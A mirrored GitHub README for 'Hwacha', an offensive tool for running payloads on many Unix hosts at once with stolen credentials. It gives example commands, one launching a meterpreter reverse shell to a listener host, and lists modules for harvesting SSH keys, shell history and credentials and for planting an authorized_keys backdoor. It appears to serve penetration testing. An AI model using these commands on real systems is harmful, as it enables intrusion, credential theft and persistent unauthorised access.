n00py / Hwacha

Deploy payloads to *Nix systems en masse

Home Page:https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Hwacha

alt tag

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/

Hwacha is a tool to quickly execute payloads on *Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.

$python hwacha.py 
    &&&&     &&         &&        &&
&&&&&&&&&&&& &&         &&        &&      Created by Esteban Rodriguez   /~~\_
   &&&&&&    &&     &&&&&&&&&&    &&	  Web: https://www.n00py.io     /| '` *\
  &&    &&   &&&&&      &&        &&&&&        Twitter: @n00py1         \|  ___/
 &&      &&  &&&&&    &&  &&      &&&&&   _   _                     _
  &&    &&   &&      &&    &&     &&     | | | |                   | |
   &&&&&&    &&    &&&      &&&   &&     | |_| |__      ____ _  ___| |__   __ _
     &&      &&   &&          &&  &&     |  _  |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&&                   &&     | | | | \ V  V / (_| | (__| | | | (_| |
             &&                   &&     \_| |_/  \_/\_/ \__,_|\___|_| |_|\__,_| 
To run commands, use -x [COMMAND]
to run modules, use -m [MODULE]
to specify module options, use -o [ARG=ARG ARG=ARG]
to see all available modules, use -L
Example usage:
python hwacha.py -t 192.168.1.1/24 -u admin  -p password
python hwacha.py -t 192.168.1.100-200 -u admin  -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin  -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin  -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"


Available Modules:
[*] meterpreter               Use this to execute a meterpreter agent on the target(s).
                              REQURED ARGUMENTS: LHOST , LPORT
                              OPTIONAL ARGUMENTS: TYPE {python, php, 32, 64, osx}
[*] mimipenguin               Use this to execute a mimipenguin on the target(s) to recover credentials.  (Requires root)
                              OPTIONAL ARGUMENTS: LISTEN
[*] keys                      Use this to collect SSH private keys from the target(s).
[*] history                   Use this to collect shell history files from the target(s).
[*] privs                     Use this to enumerate sudo privileges on the targets(s).
[*] backdoor                  Creates an RSA key pair and adds public key to authorized_keys file on targets(s).
[*] web_delivery               Use this to execute a python script on the target(s).
                              REQURED ARGUMENTS: PATH
                              OPTIONAL ARGUMENTS: LISTEN
[*] custom_bin               Use this to execute a custom binary on the target(s).
                              REQURED ARGUMENTS: PATH
[*] sudo_exec               Use this to execute a custom binary (with sudo) on the target(s).
                              REQURED ARGUMENTS: PATH
[*] shellcode               Use this to execute custom shellcode on the target(s).
                              REQURED ARGUMENTS: PATH

Requires paramiko:

pip install paramiko 

About

Deploy payloads to *Nix systems en masse

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/


Languages

Language:Python 100.0%